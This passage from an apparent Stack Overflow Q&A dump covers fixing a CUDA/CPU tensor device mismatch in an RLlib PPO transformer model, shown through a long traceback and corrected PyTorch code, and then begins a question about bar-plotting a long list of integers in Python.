pid=31224) return method(self, *_args, **_kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\rollout_worker.py", line 1743, in _update_policy_map (PPO pid=31224) self._build_policy_map( (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span (PPO pid=31224) return method(self, *_args, **_kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\rollout_worker.py", line 1854, in _build_policy_map (PPO pid=31224) new_policy = create_policy_for_framework( (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\utils\policy.py", line 141, in create_policy_for_framework (PPO pid=31224) return policy_class(observation_space, action_space, merged_config) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\algorithms\ppo\ppo_torch_policy.py", line 64, in __init__ (PPO pid=31224) self._initialize_loss_from_dummy_batch() (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\policy\policy.py", line 1484, in _initialize_loss_from_dummy_batch (PPO pid=31224) self.loss(self.model, self.dist_class, train_batch) (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\algorithms\ppo\ppo_torch_policy.py", line 112, in loss (PPO pid=31224) curr_action_dist.logp(train_batch[SampleBatch.ACTIONS]) (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\models\torch\torch_action_dist.py", line 37, in logp (PPO pid=31224) return self.dist.log_prob(actions) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\torch\distributions\categorical.py", line 143, in log_prob (PPO pid=31224) return log_pmf.gather(-1, value).squeeze(-1) (PPO pid=31224) 
^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) RuntimeError: Expected all tensors to be on the same device, but found at least two devices, cuda:0 and cpu! (when checking argument for argument index in method wrapper_CUDA_gather) (PPO pid=31224) Exception raised in creation task: The actor died because of an error raised in its creation task, ray::PPO.__init__() (pid=31224, ip=127.0.0.1, actor_id=f5d50e01341cb51a747d8a3e01000000, repr=PPO) (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\worker_set.py", line 229, in _setup (PPO pid=31224) self.add_workers( (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\worker_set.py", line 682, in add_workers (PPO pid=31224) raise result.get() (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\utils\actor_manager.py", line 497, in _fetch_result (PPO pid=31224) result = ray.get(r) (PPO pid=31224) ^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\_private\auto_init_hook.py", line 21, in auto_init_wrapper (PPO pid=31224) return fn(*args, **kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\_private\client_mode_hook.py", line 103, in wrapper (PPO pid=31224) return func(*args, **kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\_private\worker.py", line 2667, in get (PPO pid=31224) values, debugger_breakpoint = worker.get_objects(object_refs, timeout=timeout) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\_private\worker.py", line 866, in get_objects (PPO pid=31224) raise value (PPO pid=31224) ray.exceptions.RayActorError: The actor died because of an error raised in its creation task, ray::RolloutWorker.__init__() (pid=3964, ip=127.0.0.1, actor_id=b2fed95453b6755f07372fcb01000000, repr=<ray.rllib.evaluation.rollout_worker.RolloutWorker object at 0x000001D47885E850>) (PPO pid=31224) File "python\ray\_raylet.pyx", line 1889, in ray._raylet.execute_task (PPO pid=31224) File "python\ray\_raylet.pyx", line 1830, in ray._raylet.execute_task.function_executor (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\_private\function_manager.py", line 724, in actor_method_executor (PPO pid=31224) return method(__ray_actor, *args, **kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span (PPO pid=31224) return method(self, *_args, **_kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\rollout_worker.py", line 535, in __init__ (PPO pid=31224) self._update_policy_map(policy_dict=self.policy_dict) (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span (PPO pid=31224) return method(self, *_args, **_kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\rollout_worker.py", line 1743, in _update_policy_map (PPO pid=31224) self._build_policy_map( (PPO 
pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span (PPO pid=31224) return method(self, *_args, **_kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\rollout_worker.py", line 1854, in _build_policy_map (PPO pid=31224) new_policy = create_policy_for_framework( (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\utils\policy.py", line 141, in create_policy_for_framework (PPO pid=31224) return policy_class(observation_space, action_space, merged_config) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\algorithms\ppo\ppo_torch_policy.py", line 64, in __init__ (PPO pid=31224) self._initialize_loss_from_dummy_batch() (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\policy\policy.py", line 1484, in _initialize_loss_from_dummy_batch (PPO pid=31224) self.loss(self.model, self.dist_class, train_batch) (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\algorithms\ppo\ppo_torch_policy.py", line 112, in loss (PPO pid=31224) curr_action_dist.logp(train_batch[SampleBatch.ACTIONS]) (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\models\torch\torch_action_dist.py", line 37, in logp (PPO pid=31224) return self.dist.log_prob(actions) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\torch\distributions\categorical.py", line 143, in log_prob (PPO pid=31224) return log_pmf.gather(-1, value).squeeze(-1) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) RuntimeError: Expected all tensors to be on the same device, but found at least two devices, cuda:0 and cpu! 
(when checking argument for argument index in method wrapper_CUDA_gather) (PPO pid=31224) (PPO pid=31224) During handling of the above exception, another exception occurred: (PPO pid=31224) (PPO pid=31224) ray::PPO.__init__() (pid=31224, ip=127.0.0.1, actor_id=f5d50e01341cb51a747d8a3e01000000, repr=PPO) (PPO pid=31224) File "python\ray\_raylet.pyx", line 1883, in ray._raylet.execute_task (PPO pid=31224) File "python\ray\_raylet.pyx", line 1984, in ray._raylet.execute_task (PPO pid=31224) File "python\ray\_raylet.pyx", line 1889, in ray._raylet.execute_task (PPO pid=31224) File "python\ray\_raylet.pyx", line 1830, in ray._raylet.execute_task.function_executor (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\_private\function_manager.py", line 724, in actor_method_executor (PPO pid=31224) return method(__ray_actor, *args, **kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span (PPO pid=31224) return method(self, *_args, **_kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\algorithms\algorithm.py", line 533, in __init__ (PPO pid=31224) super().__init__( (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\tune\trainable\trainable.py", line 161, in __init__ (PPO pid=31224) self.setup(copy.deepcopy(self.config)) (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span (PPO pid=31224) return method(self, *_args, **_kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\algorithms\algorithm.py", line 631, in setup (PPO pid=31224) self.workers = WorkerSet( (PPO pid=31224) ^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\worker_set.py", line 181, in __init__ (PPO pid=31224) raise e.args[0].args[2] (PPO pid=31224) RuntimeError: Expected all tensors to be on the same device, but found at least two devices, cuda:0 and cpu! (when checking argument for argument index in method wrapper_CUDA_gather) (RolloutWorker pid=3964) Exception raised in creation task: The actor died because of an error raised in its creation task, ray::RolloutWorker.__init__() (pid=3964, ip=127.0.0.1, actor_id=b2fed95453b6755f07372fcb01000000, repr=<ray.rllib.evaluation.rollout_worker.RolloutWorker object at 0x000001D47885E850>) (RolloutWorker pid=3964) File "python\ray\_raylet.pyx", line 1889, in ray._raylet.execute_task (RolloutWorker pid=3964) File "python\ray\_raylet.pyx", line 1830, in ray._raylet.execute_task.function_executor (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\_private\function_manager.py", line 724, in actor_method_executor (RolloutWorker pid=3964) return method(__ray_actor, *args, **kwargs) (RolloutWorker pid=3964) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span [repeated 3x across cluster] (Ray deduplicates logs by default. 
Set RAY_DEDUP_LOGS=0 to disable log deduplication, or see https://docs.ray.io/en/master/ray-observability/ray-logging.html#log-deduplication for more options.) (RolloutWorker pid=3964) return method(self, *_args, **_kwargs) [repeated 3x across cluster] (RolloutWorker pid=3964) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [repeated 3x across cluster] (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\algorithms\ppo\ppo_torch_policy.py", line 64, in __init__ [repeated 2x across cluster] (RolloutWorker pid=3964) self._update_policy_map(policy_dict=self.policy_dict) (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\rollout_worker.py", line 1743, in _update_policy_map (RolloutWorker pid=3964) self._build_policy_map( (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\rollout_worker.py", line 1854, in _build_policy_map (RolloutWorker pid=3964) new_policy = create_policy_for_framework( (RolloutWorker pid=3964) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\utils\policy.py", line 141, in create_policy_for_framework (RolloutWorker pid=3964) return policy_class(observation_space, action_space, merged_config) (RolloutWorker pid=3964) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (RolloutWorker pid=3964) self._initialize_loss_from_dummy_batch() (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\policy\policy.py", line 1484, in _initialize_loss_from_dummy_batch (RolloutWorker pid=3964) self.loss(self.model, self.dist_class, train_batch) (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\algorithms\ppo\ppo_torch_policy.py", line 112, in loss (RolloutWorker pid=3964) curr_action_dist.logp(train_batch[SampleBatch.ACTIONS]) (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\models\torch\torch_action_dist.py", line 37, in logp (RolloutWorker pid=3964) return self.dist.log_prob(actions) (RolloutWorker pid=3964) ^^^^^^^^^^^^^^^^^^^^^^^^^^^ (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\torch\distributions\categorical.py", line 143, in log_prob (RolloutWorker pid=3964) return log_pmf.gather(-1, value).squeeze(-1) (RolloutWorker pid=3964) ^^^^^^^^^^^^^^^^^^^^^^^^^ (RolloutWorker pid=3964) RuntimeError: Expected all tensors to be on the same device, but found at least two devices, cuda:0 and cpu! (when checking argument for argument index in method wrapper_CUDA_gather) | To resolve the device mismatch error, you should let RLlib and PyTorch manage device placement automatically. Layers are no longer explicity moved to to(self.device) during initialization Used dynamic device detection of the input self.device = input_dict["obs"].device Only inputs in the forward method and values_out in the value_function are moved to the model's device manually. It's also important to override the forward and value_function methods, as suggested by @Marzi Heifari. 
Here is the modified version: import torch import torch.nn as nn from ray.rllib.models.torch.torch_modelv2 import TorchModelV2 from ray.rllib.utils.annotations import override, DeveloperAPI from ray.rllib.models.modelv2 import ModelV2 @DeveloperAPI class SimpleTransformer(TorchModelV2, nn.Module): def __init__(self, obs_space, action_space, num_outputs, model_config, name): TorchModelV2.__init__(self, obs_space, action_space, num_outputs, model_config, name) nn.Module.__init__(self) # Configuration custom_config = model_config["custom_model_config"] self.input_dim = 76 self.seq_len = custom_config["seq_len"] self.embed_size = custom_config["embed_size"] self.nheads = custom_config["nhead"] self.nlayers = custom_config["nlayers"] self.dropout = custom_config["dropout"] self.values_out = None self.device = None # Input layer self.input_embed = nn.Linear(self.input_dim, self.embed_size) # Positional encoding self.pos_encoding = nn.Embedding(self.seq_len, self.embed_size) # Transformer self.transformer = nn.TransformerEncoder( nn.TransformerEncoderLayer( d_model=self.embed_size, nhead=self.nheads, dropout=self.dropout, activation='gelu'), num_layers=self.nlayers ) # Policy and value heads self.policy_head = nn.Sequential( nn.Linear(self.embed_size + 2, 64), # Add dynamic features (wallet balance, unrealized PnL) nn.ReLU(), nn.Linear(64, num_outputs) # Action space size ) self.value_head = nn.Sequential( nn.Linear(self.embed_size + 2, 64), nn.ReLU(), nn.Linear(64, 1) ) @override(ModelV2) def forward(self, input_dict, state, seq_lens): self.device = input_dict["obs"].device x = input_dict["obs"].view(-1, self.seq_len, self.input_dim).to(self.device) dynamic_features = x[:, -1, 2:4].clone() x = self.input_embed(x) position = torch.arange(0, self.seq_len, device=self.device).unsqueeze(0).expand(x.size(0), -1) x = x + self.pos_encoding(position) transformer_out = self.transformer(x) last_out = transformer_out[:, -1, :] combined = torch.cat((last_out, dynamic_features), dim=1) logits = self.policy_head(combined) self.values_out = self.value_head(combined).squeeze(1) return logits, state @override(ModelV2) def value_function(self): return self.values_out.to(self.device) | 2 | 0 |
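The same "derive the device from the input, move parameters once at the top level" pattern in plain PyTorch, independent of RLlib; the module name and layer sizes here are made up purely for illustration.

import torch
import torch.nn as nn

class DeviceAgnosticHead(nn.Module):
    """No .to(device) inside __init__; tensors created in forward follow the input."""
    def __init__(self, in_dim: int, out_dim: int):
        super().__init__()
        self.net = nn.Sequential(nn.Linear(in_dim, 64), nn.ReLU(), nn.Linear(64, out_dim))

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        # Auxiliary tensors are allocated on the same device as the incoming batch
        pos = torch.arange(x.size(1), device=x.device, dtype=x.dtype)
        return self.net(x + pos)

model = DeviceAgnosticHead(8, 2)
if torch.cuda.is_available():
    model = model.cuda()  # one move for the whole module is enough
device = next(model.parameters()).device
print(model(torch.randn(4, 8, device=device)).shape)  # torch.Size([4, 2])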
79,572,697 | 2025-4-14 | https://stackoverflow.com/questions/79572697/produce-nice-barplots-with-python-in-pycharm | I'm working on a very basic barplot in Python where I need to plot a series of length occurrences showcasing how many times a specific one appears. I'm storing everything in an array, but when I attempt to plot I either get the y-scale wrong, or on the x-axis all the instances when instead they should be “added” on top of each other towards the total count. Below, the code I tested and an ideal output I wish to achieve which I plotted with R: print(l) [408, 321, 522, 942, 462, 564, 765, 747, 465, 957, 993, 1056, 690, 1554, 1209, 246, 462, 3705, 1554, 507, 681, 1173, 408, 330, 1317, 240, 576, 2301, 1911, 1677, 1014, 756, 918, 864, 528, 882, 1131, 1440, 1167, 1146, 1002, 906, 1056, 1881, 396, 1278, 501, 1110, 303, 1176, 699, 747, 1971, 3318, 1875, 450, 354, 1218, 378, 303, 777, 915, 5481, 576, 1920, 2022, 1662, 519, 936, 423, 1149, 600, 1896, 648, 2238, 1419, 423, 552, 1299, 1071, 963, 471, 408, 729, 1896, 1068, 1254, 1179, 1188, 645, 978, 903, 1191, 1119, 747, 1005, 273, 1191, 519, 930, 1053, 2157, 933, 888, 591, 1287, 457, 294, 291, 669, 270, 556, 444, 483, 438, 452, 659, 372, 480, 464, 477, 256, 350, 357, 524, 477, 218, 192, 216, 587, 473, 525, 657, 241, 719, 383, 459, 855, 417, 283, 408, 678, 681, 1254, 879, 250, 857, 706, 456, 567, 190, 887, 287, 240, 960, 587, 361, 816, 297, 290, 253, 335, 609, 507, 294, 1475, 464, 780, 552, 555, 1605, 1127, 382, 579, 645, 273, 241, 552, 344, 890, 1346, 1067, 764, 431, 796, 569, 1386, 413, 401, 407, 252, 375, 378, 339, 457, 1779, 243, 701, 552, 708, 174, 300, 257, 378, 777, 729, 969, 603, 378, 436, 348, 399, 1662, 1511, 799, 715, 1400, 399, 516, 399, 355, 1291, 1286, 657, 374, 492, 334, 295, 210, 270, 858, 1487, 1020, 1641, 417, 396, 303, 553, 492, 1097, 612, 441, 654, 611, 532, 474, 864, 377, 465, 435, 1003, 608, 486, 748, 351, 245, 545, 627, 303, 457, 419, 449, 843, 312, 398, 704, 315, 330, 1054, 259, 507, 372, 468, 345, 1303, 408, 1031, 471, 653, 925, 397, 231, 684, 449, 336, 344, 619, 917, 417, 516, 359, 550, 222, 789, 608, 659, 853, 360, 657, 372, 305, 353, 650, 564, 547, 969, 505, 230, 953, 769, 307, 516, 408, 342, 267, 570, 572, 348, 1005, 981, 1586, 1302, 369, 1290, 1458, 572, 1122, 363, 879, 651, 466, 1203, 485, 440, 473, 810, 1320, 461, 455, 258, 660, 297, 285, 424, 273, 378, 432, 293, 410, 327, 483, 477, 551, 894, 638, 538, 678, 303, 478, 1046, 995, 360, 252, 480, 490, 475, 394, 1185, 357, 361, 387, 489, 450, 788, 366, 340, 829, 469, 404, 593, 498, 840, 601, 235, 452, 395, 504, 299, 662, 357, 686, 683, 248, 574, 1108, 587, 483, 1481, 1297, 1334, 579, 182, 456, 1335, 513, 967, 918, 607, 564, 727, 913, 743, 312, 480, 659, 939, 705, 1001, 553, 339, 286, 452, 744, 519, 521, 491, 565, 522, 377, 861, 812, 523, 332, 800, 1015, 1000, 513, 990, 1003, 733, 542, 940, 399, 399, 612, 1361, 399, 399, 318, 319, 510, 504, 841, 1529, 506, 1881, 500, 358, 240, 1261, 354, 519, 779, 656, 311, 635, 527, 759, 333, 648, 770, 330, 584, 453, 632, 513, 998, 343, 696, 1286, 391, 374, 893, 375, 426, 658, 455, 518, 466, 417, 614, 285, 480, 845, 344, 534, 572, 1727, 1085, 480, 468, 192, 348, 578, 2433, 390, 1031, 1129, 626, 735, 963, 439, 272, 806, 743, 560, 250, 679, 459, 207, 905, 616, 404, 489, 582, 340, 435, 1632, 417, 221, 279, 462, 357, 288, 248, 981, 1015, 935, 678, 279, 348, 470, 958, 867, 352, 735, 293, 911, 460, 767, 386, 531, 411, 192, 742, 373, 1454, 970, 285, 468, 273, 1527, 612, 983, 552, 998, 553, 812, 983, 403, 1706, 781, 183, 405, 891, 
647, 1022, 946, 476, 270, 471, 888, 435, 354, 563, 526, 877, 1170, 351, 863, 1503, 562, 1174, 345, 385, 275, 374, 171, 474, 408, 1640, 345, 462, 722, 1645, 504, 840, 459, 783, 501, 473, 609, 684, 543, 353, 788, 684, 734, 242, 751, 478, 471, 365, 293, 380, 486, 617, 786, 436, 632, 624, 386, 925, 469, 405, 2406, 462, 435, 251, 1118, 349, 779, 343, 458, 264, 243, 935, 535, 576, 480, 406, 606, 495, 396, 456, 798, 404, 285, 375, 922, 1136, 330, 339, 559, 998, 239, 587, 468, 1237, 1722, 699, 436, 377, 306, 326, 1076, 385, 537, 315, 342, 386, 400, 340, 202, 266, 455, 435, 259, 317, 456, 249, 452, 1345, 699, 456, 456, 453, 275, 315, 693, 354, 475, 780, 415, 956, 554, 258, 418, 996, 552, 511, 1404, 469, 262, 398, 242, 350, 538, 379, 300, 460, 373, 276, 258, 740, 609, 753, 357, 495, 532, 551, 234, 633, 480, 312, 898, 350, 705, 265, 345, 334, 334, 582, 583, 582, 478, 465, 480, 408, 870, 624, 1107, 303, 384, 1165, 1456, 878, 297, 301, 276, 372, 551, 799, 496, 204, 552, 791, 330, 359, 480, 468, 414, 1102, 876, 1112, 850, 536, 500, 374, 825, 476, 499, 275, 345, 616, 360, 609, 310, 260, 376, 283, 390, 1529, 1310, 207, 1039, 661, 570, 1292, 914, 843, 658, 302, 1119, 609, 225, 317, 1091, 225, 403, 544, 495, 912, 744, 473, 985, 342, 630, 298, 392, 297, 933, 888, 666, 1023, 346, 310, 1134, 840, 1277, 387, 463, 435, 610, 492, 1107, 582, 582, 582, 1307, 647, 1280, 555, 645, 267, 952, 588, 348, 287, 507, 410, 737, 731, 354, 2192, 309, 388, 692, 389, 742, 766, 1228, 1640, 237, 495, 351, 285, 2443, 963, 296, 420, 482, 246, 553, 621, 405, 597, 459, 310, 300, 450, 471, 291, 610, 723, 380, 1439, 312, 900, 275, 396, 342, 309, 549, 355, 474, 417, 372, 384, 291, 987, 629, 407, 655, 357, 473, 348, 459, 599, 474, 430, 620, 584, 546, 435, 242, 1167, 627, 378, 945, 349, 255, 216, 530, 516, 606, 449, 1490, 401, 1070, 899, 452, 1304, 451, 723, 354, 229, 629, 639, 501, 465, 344, 1895, 288, 341, 2377, 542, 453, 291, 645, 494, 471, 612, 1294, 713, 1291, 467, 734, 300, 1432, 320, 753, 609, 1051, 231, 875, 704, 438, 742, 504, 1334, 738, 342, 435, 1133, 1229, 436, 310, 494, 273, 1228, 626, 470, 235, 1264, 465, 450, 350, 647, 541, 256, 231, 435, 485, 224, 555, 395, 300, 969, 237, 1717, 416, 538, 371, 326, 360, 1194, 397, 519, 645, 324, 465, 402, 477, 527, 831, 1179, 366, 889, 941, 374, 775, 581, 392, 1188, 797, 480, 418, 733, 857, 332, 255, 2847, 917, 478, 585, 591, 480, 1293, 273, 375, 489, 727, 316, 1451, 975, 762, 528, 408, 1104, 375, 265, 609, 317, 879, 542, 332, 462, 492, 284, 282, 394, 483, 493, 778, 291, 443, 350, 491, 374, 369, 862, 245, 269, 640, 282, 606, 393, 307, 488, 276, 611, 471, 1806, 1296, 336, 244, 1105, 444, 375, 1214, 294, 455, 353, 605, 669, 354, 692, 345, 643, 289, 460, 771, 351, 1635, 331, 465, 703, 352, 396, 269, 1142, 353, 552, 2790, 611, 606, 731, 447, 485, 420, 283, 744, 1265, 381, 1146, 589, 477, 309, 669, 389, 435, 558, 445, 1448, 333, 762, 1222, 779, 519, 465, 317, 375, 480, 371, 787, 305, 1276, 408, 304, 246, 791, 341, 330, 536, 278, 383, 417, 351, 323, 1068, 507, 741, 678, 613, 823, 1748, 411, 676, 287, 486, 433, 506, 194, 444, 860, 1212, 1005, 321, 462, 1158, 223, 625, 294, 294, 1598, 205, 764, 2649, 1226, 479, 543, 321, 1143, 648, 2409, 291, 1095, 651, 405, 294, 728, 267, 805, 294, 1010, 405, 368, 442, 363, 3117, 296, 466, 1621, 509, 219, 692, 453, 749, 828, 950, 683, 574, 438, 396, 461, 740, 350, 408, 1636, 746, 821, 912, 482, 532, 397, 582, 537, 761, 348, 354, 356, 978, 348, 441, 464, 1206, 576, 355, 446, 577, 1186, 396, 980, 213, 498, 597, 335, 419, 351, 617, 226, 609, 206, 762, 596, 999, 589, 
585, 477, 558, 206, 806, 405, 356, 742, 881, 426, 434, 735, 494, 611, 308, 453, 426, 664, 384, 335, 612, 286, 463, 363, 460, 327, 1007, 1285, 1021, 464, 662, 1266, 1275, 205, 581, 351, 409, 387, 406, 296, 353, 447, 472, 667, 572, 682, 460, 941, 382, 477, 819, 340, 477, 716, 461, 302, 348, 291, 459, 567, 625, 216, 713, 394, 462, 620, 486, 1049, 1027, 761, 534, 348, 346, 313, 551, 522, 612, 303, 186, 288, 1054, 481, 1263, 530, 603, 491, 297, 1989, 598, 545, 291, 568, 201, 538, 267, 894, 2037, 456, 291, 367, 338, 782, 435, 570, 245, 371, 341, 478, 511, 348, 1019, 1315, 1007, 469, 711, 848, 1810, 807, 455, 607, 435, 270, 489, 408, 574, 444, 438, 495, 474, 675, 1024, 610, 464, 477, 549, 305, 366, 306, 222, 158, 893, 312, 348, 259, 261, 336, 495, 560, 452, 273, 357, 455, 195, 506, 1403, 345, 347, 462, 957, 224, 798, 487, 372, 798, 420, 316, 400, 399, 878, 618, 371, 369, 336, 474, 350, 1081, 1012, 649, 480, 430, 570, 341, 759, 456, 237, 466, 531, 455, 846, 280, 767, 758, 624, 724, 582, 1924, 270, 570, 1800, 530, 826, 1478, 345, 624, 498, 231, 686, 592, 1671, 413, 582, 302, 504, 666, 727, 613, 857, 270, 446, 483, 1781, 1308, 358, 1393, 453, 672, 264, 412, 281, 378, 476, 562, 792, 342, 495, 342, 392, 269, 1495, 668, 490, 272, 266, 270, 1080, 401, 405, 395, 588, 306, 604, 482, 301, 1439, 1605, 1833, 441, 1287, 1093, 1564, 1093, 624, 1925, 1287, 894, 428, 547, 1924, 1455, 938, 1369, 1794, 404, 605, 570, 447, 1171, 268, 626, 318, 406, 1471, 1069, 792, 657, 482, 420, 1121, 844, 522, 1560, 734, 1318, 723, 1335, 830, 825, 287, 440, 895, 323, 782, 479, 1397, 860, 297, 1002, 570, 603, 576, 269, 466, 758, 509, 552, 462, 493, 477, 431, 351, 757, 438, 1765, 1486, 480, 907, 620, 600, 438, 576, 576, 801, 515, 862, 337, 532, 385, 953, 719, 1223, 468, 486, 445, 231, 610, 474, 311, 738, 868, 453, 558, 409, 305, 827, 308, 614, 519, 380, 763, 472, 313, 447, 960, 741, 444, 520, 543, 531, 450, 413, 305, 492, 868, 207, 1285, 492, 802, 435, 303, 723, 705, 308, 417, 353, 347, 737, 380, 477, 343, 345, 409, 408, 276, 193, 270, 845, 792, 443, 1111, 256, 800, 549, 315, 274, 426, 470, 359, 473, 271, 576, 1293, 342, 761, 577, 671, 340, 276, 394, 467, 387, 336, 920, 350, 1400, 195, 336, 1282, 282, 773, 757, 566, 396, 880, 494, 661, 953, 480, 314, 468, 468, 339, 550, 1075, 334, 318, 365, 567, 286, 1560, 207, 1344, 584, 333, 387, 1164, 1074, 1324, 1080, 405, 264, 300, 582, 342, 427, 514, 576, 993, 208, 669, 993, 439, 219, 742, 890, 966, 520, 337, 488, 438, 561, 319, 476, 300, 465, 1056, 1044, 216, 198, 267, 327, 527, 746, 447, 288, 923, 268, 300, 262, 1015, 468, 289, 341, 345, 483, 482, 548, 255, 441, 229, 435, 453, 264, 369, 403, 333, 461, 446, 221, 405, 848, 616, 396, 405, 495, 476, 315, 351, 438, 495, 482, 456, 322, 666, 1031, 633, 306, 880, 2683, 774, 494, 993, 430, 1284, 1118, 1030, 219, 384, 2249, 301, 195, 689, 251, 302, 474, 732, 790, 435, 436, 270, 198, 435, 583, 800, 310, 576, 280, 363, 651, 743, 855, 485, 673, 1014, 345, 407, 351, 